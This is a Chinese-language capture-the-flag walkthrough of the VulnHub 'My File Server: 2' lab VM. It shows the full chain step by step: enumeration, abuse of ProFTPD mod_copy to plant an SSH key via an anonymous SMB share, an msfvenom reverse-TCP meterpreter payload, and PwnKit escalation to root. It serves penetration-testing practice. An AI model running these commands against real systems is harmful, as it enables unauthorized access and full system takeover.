My File Server 2
作者:jason huawen
靶机信息
名称:My File Server: 2
地址:
https://www.vulnhub.com/entry/my-file-server-2,442/
将上述靶机的虚拟机导入到VirtualBox,并设置网络模式为host-only,与攻击机Kali Linux为同一局域网。
识别目标主机IP地址
─(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor 192.168.56.100 08:00:27:15:69:14 1 60 PCS Systemtechnik GmbH 192.168.56.104 08:00:27:4f:61:58 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.104
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]└─$ sudo nmap -sS -sV -sC -p- 192.168.56.104 -oN nmap_full_scanStarting Nmap 7.92 ( https://nmap.org ) at 2023-04-02 21:40 EDTNmap scan report for bogon (192.168.56.104)Host is up (0.00052s latency).Not shown: 64445 filtered tcp ports (no-response), 78 filtered tcp ports (host-prohibited), 1004 closed tcp ports (reset)PORT STATE SERVICE VERSION21/tcp open ftp vsftpd 3.0.2| ftp-anon: Anonymous FTP login allowed (FTP code 230)|_drwxrwxrwx 3 0 0 16 Feb 19 2020 pub [NSE: writeable]| ftp-syst: | STAT: | FTP server status:| Connected to ::ffff:192.168.56.230| Logged in as ftp| TYPE: ASCII| No session bandwidth limit| Session timeout in seconds is 300| Control connection is plain text| Data connections will be plain text| At session startup, client count was 4| vsFTPd 3.0.2 - secure, fast, stable|_End of status22/tcp open ssh OpenSSH 7.4 (protocol 2.0)| ssh-hostkey: | 2048 75:fa:37:d1:62:4a:15:87:7e:21:83:b9:2f:ff:04:93 (RSA)| 256 b8:db:2c:ca:e2:70:c3:eb:9a:a8:cc:0e:a2:1c:68:6b (ECDSA)|_ 256 66:a3:1b:55:ca:c2:51:84:41:21:7f:77:40:45:d4:9f (ED25519)80/tcp open http Apache httpd 2.4.6 ((CentOS))| http-methods: |_ Potentially risky methods: TRACE|_http-title: My File Server|_http-server-header: Apache/2.4.6 (CentOS)111/tcp open rpcbind 2-4 (RPC #100000)| rpcinfo: | program version port/proto service| 100000 2,3,4 111/tcp rpcbind| 100000 2,3,4 111/udp rpcbind| 100000 3,4 111/tcp6 rpcbind| 100000 3,4 111/udp6 rpcbind| 100003 3,4 2049/tcp nfs| 100003 3,4 2049/tcp6 nfs| 100003 3,4 2049/udp nfs| 100003 3,4 2049/udp6 nfs| 100005 1,2,3 20048/tcp mountd| 100005 1,2,3 20048/tcp6 mountd| 100005 1,2,3 20048/udp mountd| 100005 1,2,3 20048/udp6 mountd| 100021 1,3,4 35080/tcp nlockmgr| 100021 1,3,4 40393/udp6 nlockmgr| 100021 1,3,4 45446/tcp6 nlockmgr| 100021 1,3,4 60480/udp nlockmgr| 100024 1 36358/udp6 status| 100024 1 48374/udp status| 100024 1 51953/tcp status| 100024 1 58193/tcp6 status| 100227 3 2049/tcp nfs_acl| 100227 3 2049/tcp6 nfs_acl| 100227 3 2049/udp nfs_acl|_ 100227 3 2049/udp6 nfs_acl445/tcp open netbios-ssn Samba smbd 4.9.1 (workgroup: SAMBA)2049/tcp open nfs_acl 3 (RPC #100227)2121/tcp open ftp ProFTPD 1.3.5| ftp-anon: Anonymous FTP login allowed (FTP code 230)|_Can't get directory listing: ERROR20048/tcp open mountd 1-3 (RPC #100005)MAC Address: 08:00:27:4F:61:58 (Oracle VirtualBox virtual NIC)Service Info: Host: FILESERVER; OS: UnixHost script results:| smb2-security-mode: | 3.1.1: |_ Message signing enabled but not required| smb2-time: | date: 2023-04-03T01:41:43|_ start_date: N/A| smb-security-mode: | account_used: | authentication_level: user| challenge_response: supported|_ message_signing: disabled (dangerous, but default)| smb-os-discovery: | OS: Windows 6.1 (Samba 4.9.1)| Computer name: localhost| NetBIOS computer name: FILESERVER\x00| Domain name: \x00| FQDN: localhost|_ System time: 2023-04-03T07:11:44+05:30|_clock-skew: mean: -1h49m59s, deviation: 3h10m30s, median: -1sService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 87.49 seconds
获得Shell
由于目标主机有多个开放端口,因此需要逐一对各个端口进行信息收集。
端口21
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]└─$ ftp 192.168.56.104Connected to 192.168.56.104.220 (vsFTPd 3.0.2)Name (192.168.56.104:kali): anonymous331 Please specify the password.Password: 230 Login successful.Remote system type is UNIX.Using binary mode to transfer files.ftp> ls -alh229 Entering Extended Passive Mode (|||5547|).150 Here comes the directory listing.drwxr-xr-x 3 0 0 16 Feb 18 2020 .drwxr-xr-x 3 0 0 16 Feb 18 2020 ..drwxrwxrwx 3 0 0 16 Feb 19 2020 pub226 Directory send OK.ftp> cd pub250 Directory successfully changed.ftp> ls -alh229 Entering Extended Passive Mode (|||5861|).150 Here comes the directory listing.drwxrwxrwx 3 0 0 16 Feb 19 2020 .drwxr-xr-x 3 0 0 16 Feb 18 2020 ..drwxr-xr-x 9 0 0 4096 Feb 19 2020 log226 Directory send OK.ftp> cd log250 Directory successfully changed.ftp> ls -alh229 Entering Extended Passive Mode (|||5001|).150 Here comes the directory listing.drwxr-xr-x 9 0 0 4096 Feb 19 2020 .drwxrwxrwx 3 0 0 16 Feb 19 2020 ..drwxr-xr-x 2 0 0 4096 Feb 19 2020 anacondadrwxr-x--- 2 0 0 22 Feb 19 2020 audit-rw-r--r-- 1 0 0 7033 Feb 19 2020 boot.log-rw------- 1 0 0 10752 Feb 19 2020 btmp-rw-r--r-- 1 0 0 9161 Feb 19 2020 cron-rw-r--r-- 1 0 0 31971 Feb 19 2020 dmesg-rw-r--r-- 1 0 0 31971 Feb 19 2020 dmesg.olddrwxr-xr-x 2 0 0 6 Feb 19 2020 glusterfsdrwx------ 2 0 0 39 Feb 19 2020 httpd-rw-r--r-- 1 0 0 292584 Feb 19 2020 lastlog-rw------- 1 0 0 3764 Feb 19 2020 maillog-rw------- 1 0 0 1423423 Feb 19 2020 messagesdrwx------ 2 0 0 6 Feb 19 2020 pppdrwx------ 4 0 0 43 Feb 19 2020 samba-rw------- 1 0 0 63142 Feb 19 2020 secure-rw------- 1 0 0 0 Feb 19 2020 spooler-rw------- 1 0 0 0 Feb 19 2020 tallylogdrwxr-xr-x 2 0 0 22 Feb 19 2020 tuned-rw-r--r-- 1 0 0 58752 Feb 19 2020 wtmp-rw------- 1 0 0 100 Feb 19 2020 xferlog-rw------- 1 0 0 18076 Feb 19 2020 yum.log226 Directory send OK.
虽然目标主机允许匿名用户访问,但是目录中的文件没有太大价值。
端口445
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]└─$ smbclient -L 192.168.56.104 Password for [WORKGROUP\kali]:Anonymous login successful Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers smbdata Disk smbdata smbuser Disk smbuser IPC$ IPC IPC Service (Samba 4.9.1)Reconnecting with SMB1 for workgroup listing.do_connect: Connection to 192.168.56.104 failed (Error NT_STATUS_HOST_UNREACHABLE)Unable to connect with SMB1 -- no workgroup available
有两个共享目录smbdata, smbuser
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]└─$ smbclient //192.168.56.104/smbdataPassword for [WORKGROUP\kali]:Anonymous login successfulTry "help" to get a list of possible commands.smb: \> ls . D 0 Fri Feb 21 01:50:09 2020 .. D 0 Tue Feb 18 06:47:54 2020 anaconda D 0 Tue Feb 18 06:48:15 2020 audit D 0 Tue Feb 18 06:48:15 2020 boot.log N 6120 Tue Feb 18 06:48:16 2020 btmp N 384 Tue Feb 18 06:48:16 2020 cron N 4813 Tue Feb 18 06:48:16 2020 dmesg N 31389 Tue Feb 18 06:48:16 2020 dmesg.old N 31389 Tue Feb 18 06:48:16 2020 glusterfs D 0 Tue Feb 18 06:48:16 2020 lastlog N 292292 Tue Feb 18 06:48:16 2020 maillog N 1982 Tue Feb 18 06:48:16 2020 messages N 684379 Tue Feb 18 06:48:17 2020 ppp D 0 Tue Feb 18 06:48:17 2020 samba D 0 Tue Feb 18 06:48:17 2020 secure N 11937 Tue Feb 18 06:48:17 2020 spooler N 0 Tue Feb 18 06:48:17 2020 tallylog N 0 Tue Feb 18 06:48:17 2020 tuned D 0 Tue Feb 18 06:48:17 2020 wtmp N 25728 Tue Feb 18 06:48:17 2020 xferlog N 100 Tue Feb 18 06:48:17 2020 yum.log N 10915 Tue Feb 18 06:48:17 2020 sshd_config N 3906 Wed Feb 19 02:46:38 2020 authorized_keys A 389 Fri Feb 21 01:50:09 2020 19976192 blocks of size 1024. 18285180 blocks availablesmb: \> get authorized_keys getting file \authorized_keys of size 389 as authorized_keys (3.5 KiloBytes/sec) (average 3.5 KiloBytes/sec)smb: \> pwdCurrent directory is \\192.168.56.104\smbdata\smb: \> put test.txt putting file test.txt as \test.txt (5.9 kb/s) (average 5.9 kb/s)
- 允许上传文件到smbdata目录,这点很重要,后续可将特定的文件上传至该目录
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]└─$ smbclient //192.168.56.104/smbuserPassword for [WORKGROUP\kali]:Anonymous login successfultree connect failed: NT_STATUS_ACCESS_DENIED
- 不允许匿名访问smbuser目录
─(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]└─$ enum4linux 192.168.56.104[+] Enumerating users using SID S-1-22-1 and logon username '', password '' S-1-22-1-1000 Unix User\smbuser (Local User)
利用enum4linux识别出用户名smbuser
端口2121
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]└─$ ftp 192.168.56.104 -P 2121Connected to 192.168.56.104.220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.56.104]Name (192.168.56.104:kali): anonymous331 Anonymous login ok, send your complete email address as your passwordPassword: 230 Anonymous access granted, restrictions applyRemote system type is UNIX.Using binary mode to transfer files.ftp> ls -alh229 Entering Extended Passive Mode (|||65233|)ftp: Can't connect to `192.168.56.104:65233': No route to host200 EPRT command successful150 Opening ASCII mode data connection for file listdrwxr-xr-x 3 root root 16 Feb 18 2020 .drwxr-xr-x 3 root root 16 Feb 18 2020 ..drwxrwxrwx 3 root root 16 Feb 19 2020 pub226 Transfer completeftp> cd pub250 CWD command successfulftp> ls -alh200 EPRT command successful150 Opening ASCII mode data connection for file listdrwxrwxrwx 3 root root 16 Feb 19 2020 .drwxr-xr-x 3 root root 16 Feb 18 2020 ..drwxr-xr-x 9 root root 4.0k Feb 19 2020 log226 Transfer completeftp> cd log250 CWD command successfulftp> ls -alh200 EPRT command successful150 Opening ASCII mode data connection for file listdrwxr-xr-x 9 root root 4.0k Feb 19 2020 .drwxrwxrwx 3 root root 16 Feb 19 2020 ..drwxr-xr-x 2 root root 4.0k Feb 19 2020 anacondadrwxr-x--- 2 root root 22 Feb 19 2020 audit-rw-r--r-- 1 root root 6.9k Feb 19 2020 boot.log-rw------- 1 root root 10.5k Feb 19 2020 btmp-rw-r--r-- 1 root root 8.9k Feb 19 2020 cron-rw-r--r-- 1 root root 31.2k Feb 19 2020 dmesg-rw-r--r-- 1 root root 31.2k Feb 19 2020 dmesg.olddrwxr-xr-x 2 root root 6 Feb 19 2020 glusterfsdrwx------ 2 root root 39 Feb 19 2020 httpd-rw-r--r-- 1 root root 285.7k Feb 19 2020 lastlog-rw------- 1 root root 3.7k Feb 19 2020 maillog-rw------- 1 root root 1.4M Feb 19 2020 messagesdrwx------ 2 root root 6 Feb 19 2020 pppdrwx------ 4 root root 43 Feb 19 2020 samba-rw------- 1 root root 61.7k Feb 19 2020 secure-rw------- 1 root root 0 Feb 19 2020 spooler-rw------- 1 root root 0 Feb 19 2020 tallylogdrwxr-xr-x 2 root root 22 Feb 19 2020 tuned-rw-r--r-- 1 root root 57.4k Feb 19 2020 wtmp-rw------- 1 root root 100 Feb 19 2020 xferlog-rw------- 1 root root 17.7k Feb 19 2020 yum.log226 Transfer complete
允许匿名FTP访问
目录内容与21端口已知
──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]└─$ searchsploit ProFTPD 1.3.5 --------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path--------------------------------------------------------------------------------------------------------------------------- ---------------------------------ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | linux/remote/37262.rbProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | linux/remote/36803.pyProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2) | linux/remote/49908.pyProFTPd 1.3.5 - File Copy | linux/remote/36742.txt--------------------------------------------------------------------------------------------------------------------------- ---------------------------------Shellcodes: No Results
- 存在命令执行漏洞
但是这个漏洞利用metasploit执行没有成功,还是需要利用mod copy漏洞,将本地生成的id_rsa.pub文件上传至smbuser的家目录下,
首先利用smb协议将id_rsa.pub上传至/smbdata目录下,然你利用mod copy漏洞移动该文件并重命名为authorized_keys
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]└─$ ssh-keygen Generating public/private rsa key pair.Enter file in which to save the key (/home/kali/.ssh/id_rsa): id_rsaEnter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in id_rsaYour public key has been saved in id_rsa.pubThe key fingerprint is:SHA256:GXPq6h/MYwYkQIZ6kkCZjVeQq3kZuNlsHcLf+L0RXfw kali@kaliThe key's randomart image is:+---[RSA 3072]----+|.+O.+. ||o= = . ||o.+ o . o . o ||+..= + *. . . || oB * = S. . E || = * + * . || o . X. || = +. || .o.... |+----[SHA256]-----+
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]└─$ smbclient //192.168.56.104/smbdataPassword for [WORKGROUP\kali]:Anonymous login successfulTry "help" to get a list of possible commands.smb: \> put id_rsa.pub putting file id_rsa.pub as \id_rsa.pub (137.4 kb/s) (average 137.5 kb/s)
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]└─$ telnet 192.168.56.104 2121Trying 192.168.56.104...Connected to 192.168.56.104.Escape character is '^]'.220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.56.104]SITE CPFR /smbdata/id_rsa.pub350 File or directory exists, ready for destination nameSITE CPTO /home/smbuser/.ssh/authorized_keys250 Copy successful
这样就利用了ProFTPd的mod copy漏洞将id_rsa.pub公钥文件上传至smbuser的家目录
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]└─$ ssh -i id_rsa smbuser@192.168.56.104 ############################################################################################## # Armour Infosec # # --------- www.armourinfosec.com ------------ # # My File Server - 2 # # Designed By :- Akanksha Sachin Verma # # Twitter :- @akankshavermasv # ##############################################################################################Last login: Fri Feb 21 12:39:36 2020[smbuser@fileserver ~]$ iduid=1000(smbuser) gid=1000(smbuser) groups=1000(smbuser)[smbuser@fileserver ~]$
这样我们成功的得到了用户smbuser的Shell
提权
接下来用metaploit工具进行提权,首先利用msfvenom工具构建payload:
$ msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=192.168.56.230 LPORT=6666 -f elf -o escalator.elf
将上述escalator.elf上传至目标主机的/tmp目录,并添加可执行权限
同时在Kali Linux上启动msfconsole,
msf6 > use exploit/multi/handlermsf6 exploit(multi/handler) > set payload linux/x86/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.56.230LHOST => 192.168.56.230msf6 exploit(multi/handler) > set LPORT 6666LPORT => 6666msf6 exploit(multi/handler) > run[*] Started reverse TCP handler on 192.168.56.230:6666 [*] Meterpreter session 1 opened (192.168.56.230:6666 -> 192.168.56.104:41659) at 2023-04-02 22:39:49 -0400
这样就得到了meterpreter session,利用这个Meterpreter session进行提权
meterpreter > run post/multi/recon/local_exploit_suggester[*] 192.168.56.104 - Collecting local exploits for x86/linux...[*] 192.168.56.104 - 167 exploit checks are being tried...[+] 192.168.56.104 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.[+] 192.168.56.104 - exploit/linux/local/netfilter_priv_esc_ipv4: The target appears to be vulnerable.[+] 192.168.56.104 - exploit/linux/local/network_manager_vpnc_username_priv_esc: The service is running, but could not be validated.[+] 192.168.56.104 - exploit/linux/local/pkexec: The service is running, but could not be validated.[+] 192.168.56.104 - exploit/linux/local/ptrace_sudo_token_priv_esc: The service is running, but could not be validated.[+] 192.168.56.104 - exploit/linux/local/su_login: The target appears to be vulnerable.[*] Running check method for exploit 48 / 48[*] 192.168.56.104 - Valid modules for session 1:============================ # Name Potentially Vulnerable? Check Result - ---- ----------------------- ------------ 1 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec Yes The target is vulnerable. 2 exploit/linux/local/netfilter_priv_esc_ipv4 Yes The target appears to be vulnerable. 3 exploit/linux/local/network_manager_vpnc_username_priv_esc Yes The service is running, but could not be validated. 4 exploit/linux/local/pkexec Yes The service is running, but could not be validated. 5 exploit/linux/local/ptrace_sudo_token_priv_esc Yes The service is running, but could not be validated. 6 exploit/linux/local/su_login Yes The target appears to be vulnerable.
有多个模块可以用于提权,选择第一个
meterpreter > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show options Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec): Name Current Setting Required Description ---- --------------- -------- ----------- PKEXEC_PATH no The path to pkexec binary SESSION yes The session to run this module on WRITABLE_DIR /tmp yes A directory where we can write filesPayload options (linux/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 10.0.2.15 yes The listen address (an interface may be specified) LPORT 4444 yes The listen portExploit target: Id Name -- ---- 0 x86_64msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LHOST 192.168.56.230LHOST => 192.168.56.230msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 8888LPORT => 8888msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION 1SESSION => 1msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run[*] Started reverse TCP handler on 192.168.56.230:8888 [*] Running automatic check ("set AutoCheck false" to disable)[!] Verify cleanup of /tmp/.alwwwbblxxel[+] The target is vulnerable.[*] Writing '/tmp/.arzick/ndpnoo/ndpnoo.so' (548 bytes) ...[!] Verify cleanup of /tmp/.arzick[*] Sending stage (3020772 bytes) to 192.168.56.104[+] Deleted /tmp/.arzick/ndpnoo/ndpnoo.so[+] Deleted /tmp/.arzick/.bawgxle[+] Deleted /tmp/.arzick[*] Meterpreter session 2 opened (192.168.56.230:8888 -> 192.168.56.104:47993) at 2023-04-02 22:45:10 -0400idmeterpreter > id[-] Unknown command: idmeterpreter > getuidServer username: rootmeterpreter > shellProcess 22664 created.Channel 1 created.iduid=0(root) gid=0(root) groups=0(root),1000(smbuser)cd /rootls -alhtotal 44Kdrwxr--r--. 4 root root 4.0K Feb 21 2020 .dr-xr-xr-x. 18 root root 4.0K Feb 18 2020 ..-rwxr--r--. 1 root root 131 Feb 21 2020 .bash_history-rwxr--r--. 1 root root 18 Dec 29 2013 .bash_logout-rwxr--r--. 1 root root 176 Dec 29 2013 .bash_profile-rwxr--r--. 1 root root 176 Dec 29 2013 .bashrc-rwxr--r--. 1 root root 100 Dec 29 2013 .cshrcdrwxr--r--. 3 root root 18 Feb 18 2020 .pkidrwxr--r-- 2 root root 6 Feb 19 2020 .ssh-rwxr--r--. 1 root root 129 Dec 29 2013 .tcshrc-rwxr--r-- 1 root root 6.2K Feb 21 2020 .viminfo-rwxr--r-- 1 nobody nobody 48 Feb 20 2020 proof.txtcat proof.txtBest of Luckaf52e0163b03cbf7c6dd146351594a43
至此拿到了root shell和root flag.
经验教训
当遇到靶机有proFTPD时,那么很有可能需要利用mod_copy漏洞拷贝文件实现Shell的获取
虽然searchsploit本身直接给出了proFTPD 1.3.5版本的可执行命令漏洞,但是并没有成功。
可以用smb协议将所创建的id_rsa.pub公钥文件长传之smbdata目录,注意这里的smbdata目录为根下面的一级目录,或者说是绝对路径,然后利用proFTPD将该文件拷贝(并重命名)到/home/smbuser/.ssh/目录,因为通过enum4linux工具已经知道了目标主机存在用户名smbuser
本靶机利用了metasploit工具来实现本地提权,感觉比较爽。
STRIVE FOR PROGRESS,NOT FOR PERFECTION